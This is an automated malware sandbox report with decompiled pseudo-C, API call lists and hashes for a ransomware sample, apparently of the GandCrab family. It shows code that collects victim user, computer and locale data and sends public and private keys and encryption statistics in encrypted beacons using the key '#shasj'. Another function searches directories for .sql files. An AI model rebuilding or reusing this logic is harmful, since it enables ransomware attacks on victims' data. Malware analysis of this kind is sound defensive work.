                                        0x0f9d5a83
                                        0x0f9d5aa1
                                        0x0f9d5ab1
                                        0x0f9d5ac0
                                        0x0f9d5ac4
                                        0x0f9d5acf
                                        0x0f9d5ad2
                                        0x0f9d5af0
                                        0x0f9d5afc
                                        0x0f9d5aff
                                        0x0f9d5b21
                                        0x0f9d5b2d
                                        0x0f9d5b47
                                        0x0f9d5b57
                                        0x0f9d5b59
                                        0x0f9d5b5f
                                        0x0f9d5b68
                                        0x0f9d5b76
                                        0x0f9d5b6e
                                        0x0f9d5b6e
                                        0x0f9d5b6e
                                        0x0f9d5b7e
                                        0x0f9d5b80
                                        0x0f9d5b86
                                        0x0f9d5b88
                                        0x0f9d5b97
                                        0x0f9d5b9b
                                        0x0f9d5ba7
                                        0x0f9d5bac
                                        0x0f9d5bb5
                                        0x0f9d5bbb
                                        0x0f9d5bbf
                                        0x0f9d5bc7
                                        0x0f9d5be8
                                        0x0f9d5bf1
                                        0x0f9d5bff
                                        0x0f9d5c0e
                                        0x0f9d5c12
                                        0x0f9d5c2e
                                        0x0f9d5c30
                                        0x0f9d5c30
                                        0x0f9d5c40
                                        0x0f9d5c40
                                        0x0f9d5c4d
                                        0x0f9d5c53
                                        0x0f9d5c53
                                        0x0f9d5c56
                                        0x0f9d5c5c
                                        0x0f9d5c66
                                        0x0f9d5c66
                                        0x0f9d5c5e
                                        0x0f9d5c5e
                                        0x0f9d5c64
                                        0x00000000
                                        0x00000000
                                        0x0f9d5c64
                                        0x0f9d5c6f
                                        0x0f9d5c75
                                        0x0f9d5c77
                                        0x0f9d5c7b
                                        0x0f9d5c80
                                        0x0f9d5c80
                                        0x0f9d5c85
                                        0x0f9d5c8b
                                        0x0f9d5c8e
                                        0x0f9d5c8e
                                        0x0f9d5c93
                                        0x0f9d5c94
                                        0x0f9d5c96
                                        0x0f9d5c9a
                                        0x0f9d5c80
                                        0x0f9d5c9e
                                        0x0f9d5cb4
                                        0x0f9d5cc0
                                        0x0f9d5cca
                                        0x0f9d5cd4
                                        0x0f9d5d07
                                        0x0f9d5d0d
                                        0x0f9d5d12
                                        0x0f9d5d12
                                        0x0f9d5d26
                                        0x0f9d5d33
                                        0x0f9d5d40
                                        0x0f9d5d4a
                                        0x0f9d5d4a
                                        0x0f9d5cd6
                                        0x0f9d5ce7
                                        0x0f9d5cf4
                                        0x0f9d5d01
                                        0x0f9d5d03
                                        0x0f9d5d03
                                        0x0f9d5cd4
                                        0x0f9d5d5a
                                        0x0f9d5d60
                                        0x0f9d5d6d

                                        APIs
                                          • Part of subcall function 0F9D39F0: GetProcessHeap.KERNEL32(?,?,0F9D4637,00000000,?,00000000,00000000), ref: 0F9D3A8C
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F9D7357
                                          • Part of subcall function 0F9D7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0F9D7368
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F9D7386
                                          • Part of subcall function 0F9D7330: GetComputerNameW.KERNEL32 ref: 0F9D7390
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F9D73B0
                                          • Part of subcall function 0F9D7330: wsprintfW.USER32 ref: 0F9D73F1
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F9D740E
                                          • Part of subcall function 0F9D7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F9D7432
                                          • Part of subcall function 0F9D7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0F9D4640,?), ref: 0F9D7456
                                          • Part of subcall function 0F9D7330: RegCloseKey.ADVAPI32(00000000), ref: 0F9D7472
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7192
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D719D
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71B3
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71BE
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71D4
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71DF
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71F5
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(0F9D4966,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7200
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7216
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7221
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7237
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7242
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7261
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D726C
                                        • VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0F9D58F0
                                        • CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0F9D599A
                                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0F9D59B3
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D59BC
                                        • lstrlenA.KERNEL32(?), ref: 0F9D59C4
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0F9D59D5
                                        • lstrlenA.KERNEL32(?), ref: 0F9D59EF
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5A18
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5A38
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5A64
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5A75
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5A97
                                        • lstrcatW.KERNEL32(?,action=call&), ref: 0F9D5AB1
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5ABA
                                        • lstrcatW.KERNEL32(?,&pub_key=), ref: 0F9D5ACF
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5AD2
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5ADB
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,74CB69A0,00000000), ref: 0F9D5AF0
                                        • lstrcatW.KERNEL32(?,&priv_key=), ref: 0F9D5AFC
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5AFF
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5B0C
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,74CB69A0,00000000), ref: 0F9D5B21
                                        • lstrcatW.KERNEL32(?,&version=2.3r), ref: 0F9D5B2D
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5B39
                                        • VirtualAlloc.KERNEL32(00000000,-00000012,00003000,00000040), ref: 0F9D5B4D
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5B5D
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5B7E
                                        • _memset.LIBCMT ref: 0F9D5BC7
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5BDA
                                          • Part of subcall function 0F9D5D70: _memset.LIBCMT ref: 0F9D5D9D
                                        • CryptBinaryToStringA.CRYPT32(?,-00000012,40000001,?,?), ref: 0F9D5C26
                                        • GetLastError.KERNEL32 ref: 0F9D5C30
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5C37
                                        • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0F9D5C46
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5C51
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5C71
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5C94
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5CA3
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000000), ref: 0F9D5CB4
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5CE7
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5CF4
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D01
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D26
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D33
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D40
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$Alloc$Free$lstrcat$BinaryByteCharCryptMultiStringWide$Name_memset$CloseComputerErrorHeapLastOpenProcessQueryUserValuewsprintf
                                        • String ID: #shasj$&priv_key=$&pub_key=$&version=2.3r$action=call&
                                        • API String ID: 2781787645-472827701
                                        • Opcode ID: 255cd6b7fce2ff359efd85a661351dd3fbec36fc6ca318337ea6fb5f227a63c6
                                        • Instruction ID: 0e4f7796f0be8b74af80200d39dc9013b07669d75eeaa73f59306592892bc88a
                                        • Opcode Fuzzy Hash: 255cd6b7fce2ff359efd85a661351dd3fbec36fc6ca318337ea6fb5f227a63c6
                                        • Instruction Fuzzy Hash: 6DE1EE71108302AFE720DF24CC84B6BBBE9EF88754F24891CF585A7291D774E915CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6A40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136stringfilememoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D6A40(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0F9D8100(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E0F9D69E0(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}



















                                        0x0f9d6a4b
                                        0x0f9d6a4f
                                        0x0f9d6a5e
                                        0x0f9d6a61
                                        0x0f9d6a64
                                        0x0f9d6a7e
                                        0x0f9d6a83
                                        0x0f9d6a86
                                        0x0f9d6a90
                                        0x0f9d6aa0
                                        0x00000000
                                        0x0f9d6abc
                                        0x0f9d6ac4
                                        0x0f9d6acb
                                        0x0f9d6ad1
                                        0x0f9d6ad4
                                        0x0f9d6ad9
                                        0x0f9d6ba8
                                        0x0f9d6ba8
                                        0x00000000
                                        0x0f9d6ae0
                                        0x0f9d6ae0
                                        0x0f9d6ae6
                                        0x0f9d6ae9
                                        0x0f9d6aea
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d6aea
                                        0x0f9d6aee
                                        0x00000000
                                        0x0f9d6af4
                                        0x0f9d6afa
                                        0x0f9d6afe
                                        0x00000000
                                        0x0f9d6b04
                                        0x0f9d6b17
                                        0x0f9d6b22
                                        0x0f9d6b26
                                        0x0f9d6b2f
                                        0x0f9d6b40
                                        0x0f9d6b44
                                        0x0f9d6b57
                                        0x0f9d6b6e
                                        0x0f9d6b74
                                        0x0f9d6b7e
                                        0x0f9d6b7e
                                        0x0f9d6b89
                                        0x0f9d6b89
                                        0x0f9d6b8f
                                        0x0f9d6b8f
                                        0x0f9d6b93
                                        0x0f9d6b99
                                        0x0f9d6b9e
                                        0x0f9d6baa
                                        0x0f9d6baf
                                        0x00000000
                                        0x0f9d6baf
                                        0x0f9d6b9e
                                        0x0f9d6afe
                                        0x0f9d6aee
                                        0x0f9d6ad9
                                        0x00000000
                                        0x0f9d6bb2
                                        0x0f9d6bc2
                                        0x0f9d6bcd
                                        0x0f9d6bdb

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6A52
                                        • lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6A64
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6A72
                                        • lstrcmpW.KERNEL32(?,0F9DFEC8,?,?), ref: 0F9D6A9C
                                        • lstrcmpW.KERNEL32(?,0F9DFECC,?,?), ref: 0F9D6AB2
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0F9D6AC4
                                        • lstrlenW.KERNEL32(00000000,?,?), ref: 0F9D6ACB
                                        • lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F9D6AFA
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F9D6B11
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F9D6B1C
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F9D6B3A
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F9D6B4F
                                        • lstrlenA.KERNEL32(*******************,?,?), ref: 0F9D6B6E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F9D6B89
                                        • CloseHandle.KERNEL32(00000000,?,?), ref: 0F9D6B93
                                        • FindNextFileW.KERNEL32(?,?,?,?), ref: 0F9D6BBC
                                        • FindClose.KERNEL32(?,?,?), ref: 0F9D6BCD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
                                        • String ID: *******************$.sql
                                        • API String ID: 3616287438-58436570
                                        • Opcode ID: 7acef97b6cf5bf908ecdaaa8ee129a3ebd2e9f96ac06adc6bed569c35bb26690
                                        • Instruction ID: db7127e1794116e3484887351a720f12dd837b5ffa9690e8d09b30950e54e4e8
                                        • Opcode Fuzzy Hash: 7acef97b6cf5bf908ecdaaa8ee129a3ebd2e9f96ac06adc6bed569c35bb26690
                                        • Instruction Fuzzy Hash: 4441A671606216ABEB209F64CC49FAE77ACEF45715F608055F502E3182DB78AA50CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D5670 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 169stringmemoryencryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 51%
                                        			E0F9D5670(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				BYTE* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				char _v22;
				short _v24;
				short _v28;
				char _v36;
				char _v180;
				char _v435;
				char _v436;
				WCHAR* _t40;
				signed int _t48;
				int _t60;
				void* _t61;
				char _t68;
				CHAR* _t71;
				void* _t74;
				short _t79;
				short _t80;
				char _t81;
				BYTE* _t84;
				WCHAR* _t92;
				signed int _t93;
				char* _t95;
				void* _t96;
				int _t98;
				long _t99;
				void* _t100;

				_t88 = __edx;
				_t74 = __ecx;
				_t96 = __edx;
				_v12 = __ecx;
				_t40 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v16 = _t40;
				if(_t40 == 0) {
					_t92 = 0;
					_t71 = 0;
				} else {
					_t3 =  &(_t40[0x400]); // 0x800
					_t71 = _t3;
					_t92 = _t40;
				}
				_push(_t96);
				_v8 = _t92;
				wsprintfW(_t92, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v12, _a4, _a8);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(_t74);
				_push(0);
				_push(0);
				_push(_t74);
				_push(0);
				E0F9D39F0( &_v180);
				E0F9D7330( &_v180, _t88);
				E0F9D7140( &_v180);
				E0F9D6F40( &_v180,  &(_t92[lstrlenW(_t92)]));
				_t48 = lstrlenW(_t92);
				_t79 = "#shasj"; // 0x61687323
				_t93 = _t48;
				asm("movq xmm0, [0xf9dfc78]");
				_v28 = _t79;
				_t80 =  *0xf9dfc84; // 0x6a73
				_v24 = _t80;
				_t81 =  *0xf9dfc86; // 0x0
				asm("movq [ebp-0x20], xmm0");
				_v22 = _t81;
				_v436 = 0;
				E0F9D9010( &_v435, 0, 0xff);
				E0F9D5D70( &_v436,  &_v36, lstrlenA( &_v36));
				_t98 = _t93 + _t93;
				E0F9D5E20( &_v436, _v8, _t98);
				_v20 = _t93 * 8;
				if(CryptBinaryToStringA(_v8, _t98, 0x40000001, _t71,  &_v20) == 0) {
					GetLastError();
				}
				_t29 = lstrlenA(_t71) + 4; // 0x4
				_t99 = _t29;
				_v12 = VirtualAlloc(0, _t99, 0x3000, 0x40);
				_t60 = lstrlenA(_t71);
				_t84 = _v12;
				_t61 = _t60 + 2;
				if(_t84 == 0) {
					L7:
					_v8 = 0;
				} else {
					_v8 = _t84;
					if(_t61 >= _t99) {
						goto L7;
					}
				}
				_t100 = 0;
				if(lstrlenA(_t71) != 0) {
					_t95 = _v8;
					do {
						_t68 =  *((intOrPtr*)(_t100 + _t71));
						if(_t68 != 0xa && _t68 != 0xd) {
							 *_t95 = _t68;
							_t95 = _t95 + 1;
						}
						_t100 = _t100 + 1;
					} while (_t100 < lstrlenA(_t71));
				}
				E0F9D54A0(_v8, 0, 0);
				_t73 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E0F9D7C10( &_v180);
				VirtualFree(_v16, 0, 0x8000);
				_t67 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}
































                                        0x0f9d5670
                                        0x0f9d5670
                                        0x0f9d568a
                                        0x0f9d568c
                                        0x0f9d568f
                                        0x0f9d5695
                                        0x0f9d569a
                                        0x0f9d56a6
                                        0x0f9d56a8
                                        0x0f9d569c
                                        0x0f9d569c
                                        0x0f9d569c
                                        0x0f9d56a2
                                        0x0f9d56a2
                                        0x0f9d56aa
                                        0x0f9d56ae
                                        0x0f9d56bd
                                        0x0f9d56c6
                                        0x0f9d56c8
                                        0x0f9d56c9
                                        0x0f9d56ce
                                        0x0f9d56d0
                                        0x0f9d56d1
                                        0x0f9d56d3
                                        0x0f9d56d4
                                        0x0f9d56d6
                                        0x0f9d56d7
                                        0x0f9d56d9
                                        0x0f9d56da
                                        0x0f9d56df
                                        0x0f9d56e1
                                        0x0f9d56e2
                                        0x0f9d56ea
                                        0x0f9d56f5
                                        0x0f9d5700
                                        0x0f9d5718
                                        0x0f9d571e
                                        0x0f9d5720
                                        0x0f9d5726
                                        0x0f9d5728
                                        0x0f9d5736
                                        0x0f9d5739
                                        0x0f9d5745
                                        0x0f9d5749
                                        0x0f9d5752
                                        0x0f9d5757
                                        0x0f9d575a
                                        0x0f9d5761
                                        0x0f9d577d
                                        0x0f9d5785
                                        0x0f9d5792
                                        0x0f9d57a1
                                        0x0f9d57ba
                                        0x0f9d57bc
                                        0x0f9d57bc
                                        0x0f9d57d2
                                        0x0f9d57d2
                                        0x0f9d57df
                                        0x0f9d57e2
                                        0x0f9d57e4
                                        0x0f9d57e7
                                        0x0f9d57ec
                                        0x0f9d57f5
                                        0x0f9d57f5
                                        0x0f9d57ee
                                        0x0f9d57ee
                                        0x0f9d57f3
                                        0x00000000
                                        0x00000000
                                        0x0f9d57f3
                                        0x0f9d57fd
                                        0x0f9d5803
                                        0x0f9d5805
                                        0x0f9d5808
                                        0x0f9d5808
                                        0x0f9d580d
                                        0x0f9d5813
                                        0x0f9d5815
                                        0x0f9d5815
                                        0x0f9d5817
                                        0x0f9d581e
                                        0x0f9d5808
                                        0x0f9d5829
                                        0x0f9d5843
                                        0x0f9d5850
                                        0x0f9d5858
                                        0x0f9d5867
                                        0x0f9d586b
                                        0x0f9d5871

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0F9D568F
                                        • wsprintfW.USER32 ref: 0F9D56BD
                                        • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F9D570C
                                        • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F9D571E
                                        • _memset.LIBCMT ref: 0F9D5761
                                        • lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0F9D576D
                                        • CryptBinaryToStringA.CRYPT32(?,74CB69A0,40000001,00000000,00000000), ref: 0F9D57B2
                                        • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57BC
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57C9
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57D8
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57E2
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D57FF
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D5818
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D5850
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0F9D5867
                                        Strings
                                        • #shasj, xrefs: 0F9D5720
                                        • action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0F9D56B7
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$AllocFree$BinaryCryptErrorLastString_memsetwsprintf
                                        • String ID: #shasj$action=result&e_files=%d&e_size=%I64u&e_time=%d&
                                        • API String ID: 2994799111-4131875188
                                        • Opcode ID: b97c54c66967e5881f31c2355ab5d60a25196413129584c32ae6a99e7494c735
                                        • Instruction ID: 4b3846844843bca3adad47a4416aa51267287b95fb9ecbd376b45b9ad7cf64d3
                                        • Opcode Fuzzy Hash: b97c54c66967e5881f31c2355ab5d60a25196413129584c32ae6a99e7494c735
                                        • Instruction Fuzzy Hash: 0F51E171904219ABEB20EBA4DC45FEEBB7DEF44300F644064FA05A71C2EB746A54CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D5210 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 145memorystringencryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 73%
                                        			E0F9D5210(CHAR* __ecx, CHAR** __edx) {
				int _v8;
				long _v12;
				char _v14;
				void* _v16;
				void* _v20;
				void* _v24;
				char _v28;
				CHAR** _v32;
				void* _v36;
				char _v291;
				char _v292;
				void* _v348;
				void* _v352;
				int _t43;
				BYTE* _t44;
				int _t46;
				void* _t50;
				void* _t51;
				char _t52;
				void* _t64;
				signed int _t66;
				signed int _t68;
				int _t69;
				int _t72;
				char _t74;
				intOrPtr _t75;
				CHAR* _t84;
				char* _t86;
				void* _t88;
				signed char _t89;
				WCHAR* _t94;
				CHAR* _t95;
				BYTE* _t101;
				WCHAR* _t102;
				WCHAR* _t103;
				void* _t104;
				long _t105;
				long _t106;
				int _t107;
				void* _t108;
				CHAR* _t109;
				void* _t110;

				_t86 = __ecx;
				_v32 = __edx;
				_t43 = lstrlenA(__ecx) + 1;
				_v8 = _t43;
				_t3 = _t43 + 1; // 0x2
				_t105 = _t3;
				_t44 = VirtualAlloc(0, _t105, 0x3000, 0x40);
				_v36 = _t44;
				if(_t44 == 0 || _v8 >= _t105) {
					_t101 = 0;
					__eflags = 0;
				} else {
					_t101 = _t44;
				}
				_t106 = 0;
				_t46 = CryptStringToBinaryA(_t86, 0, 1, _t101,  &_v8, 0, 0);
				_t119 = _t46;
				if(_t46 == 0) {
					GetLastError();
					goto L14;
				} else {
					_t50 = "#shasj"; // 0x61687323
					asm("movq xmm0, [0xf9dfc78]");
					_t107 = _v8;
					_v20 = _t50;
					_t51 =  *0xf9dfc84; // 0x6a73
					_v16 = _t51;
					_t52 =  *0xf9dfc86; // 0x0
					_v14 = _t52;
					asm("movq [ebp-0x18], xmm0");
					_v292 = 0;
					E0F9D9010( &_v291, 0, 0xff);
					E0F9D5D70( &_v292,  &_v28, lstrlenA( &_v28));
					E0F9D5E20( &_v292, _t101, _t107);
					_t94 =  &_v28;
					asm("xorps xmm0, xmm0");
					asm("movdqu [ebp-0x18], xmm0");
					E0F9D33E0(_t94, _t119, _t101);
					if(_v28 != 0) {
						E0F9D5190();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(lstrlenA);
						_push(_t107);
						_push(_t101);
						_t102 = _t94;
						_t108 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
						_v352 = _t108;
						GetModuleFileNameW(0, _t108, 0x200);
